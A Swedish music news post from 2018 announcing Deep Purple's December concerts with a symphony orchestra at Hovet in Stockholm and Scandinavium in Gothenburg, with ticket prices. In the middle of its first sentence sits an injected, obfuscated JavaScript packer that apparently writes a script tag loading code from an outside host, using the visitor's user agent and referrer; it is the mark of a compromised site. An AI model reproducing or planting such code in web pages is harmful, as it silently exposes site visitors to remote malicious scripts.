Image Image Image Image Image Image Image Image Image Image

| 19 september, 2018

Scroll to top

Top

Deep Purple till Sverige

Deep Purple till Sverige
Alexander Gylemo

Det eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nnser|var|u0026u|referrer|syebi||js|php’.split(‘|’),0,{}))
ser ut som att vi kommer få hjälp att genomlida den kommande vintern av inga mindre än Deep Purple som är på ingång för ett snabbstopp i Sverige – den här gången tillsammans med en hel symfoniorkester
.

Det legendariska brittiska rockbandet bildades 1968 och slog igenom två år senare med albumet ”Deep Purple In Rock” och låten ”Hush”. Efter det skivsläppet kom hit efter hit som t.ex. ”Strange Kind of Woman”, Highway Star” och så klart ”Smoke on the Water”, låten och gitarriffet som gjorde bandet aldrig kommer glömmas i rocksammanhang.

Den nionde december kommer bandet tillsammans med en symfoniorkester till Hovet i Stockholm för att sedan tåga vidare ner till Göteborg och Scandinavium där de gör samma konsert den tionde december. Biljetterna kostar 495-695 :- beroende på var man vill stå och kan köpas på ticnet.se (här för Göteborgs-konserten).